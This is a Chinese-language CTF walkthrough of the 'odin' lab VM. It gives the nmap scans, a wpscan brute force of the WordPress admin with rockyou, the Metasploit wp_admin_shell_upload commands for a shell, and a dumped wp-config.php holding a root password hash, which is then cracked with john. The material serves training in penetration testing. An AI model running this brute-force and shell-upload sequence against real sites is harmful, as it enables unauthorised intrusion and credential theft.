靶机描述:
1、找到靶机ip:192.168.75.14
nmap -sn 192.168.75.142、扫描靶机端口
root@chounana:~# nmap -p- -A 192.168.75.14
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for odin (192.168.75.14)
Host is up (0.00047s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.5.3
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: vikingarmy – Just another Joomla site
MAC Address: 08:00:27:88:3A:32 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/6%OT=80%CT=1%CU=34504%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=5FF59DB7%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=107%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms odin (192.168.75.14)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.13 seconds
root@chounana:~#
3、就只有一个80端口,这里访问之后,随便访问一下,会跳到http://odin/,其实前面提示就说了,要把192.168.75.14 odin添加到/etc/hosts文件中,再次访问odin,成功跳出页面
看到这个名字就觉得像wp网站,试了一下wp-admin后台,发现确实存在,扫描目录也能得到特征目录,确实是wp网站,先用wpscan扫描一下漏洞插件和用户,没什么发现,尝试爆破密码,在后台输入admin+密码(乱输),发现提示密码错误,说明admin用户存在
使用wpscan爆破密码:
wpscan --url http://odin --usernames admin --passwords /usr/share/wordlists/rockyou.txt
拿到用后台用户名和密码之后就好办了,反弹shell方法就很多了,前面用过的就是修改404.php页面,这里我演示使用msfconsole反弹shell,命令如下
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS odin
set username admin
set password qwerty
run
shell没有python,使用python3提权到tty,在wp-config.php文件发现root用户加密的密码
www-data@osboxes:$ cd /var/www/html
cd /var/www/html
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
www-data@osboxes:/var/www/html$ ls
ls
index.php wp-blog-header.php wp-cron.php wp-mail.php
license.txt wp-comments-post.php wp-includes wp-settings.php
readme.html wp-config-sample.php wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php wp-load.php wp-trackback.php
wp-admin wp-content wp-login.php xmlrpc.php
www-data@osboxes:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'joomla' );
/** MySQL database username */
define( 'DB_USER', 'joomla' );
/** MySQL database password */
define( 'DB_PASSWORD', 'joomla' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' );
define( 'SECURE_AUTH_KEY', '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' );
define( 'LOGGED_IN_KEY', 'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' );
define( 'NONCE_KEY', '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' );
define( 'AUTH_SALT', '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' );
define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:fmFb@%twt2_z=P((gdUY@HgG5Mq4=q-5e$vg' );
define( 'LOGGED_IN_SALT', '6gs|sWkYAZ@?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' );
define( 'NONCE_SALT', 'xA+mKYMD;]J@>tEi%MT1!<$|<5KBs1AX@C8E|y2WAE=NwR5{3:piVlWHr6JsK[6u' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/
www-data@osboxes:/var/www/html$
4、使用john破解密码:jasmine
然后使用前面的shell,切换到root用户,得到flag,base64解密得到一个视频链接,访问了一下,是一段音乐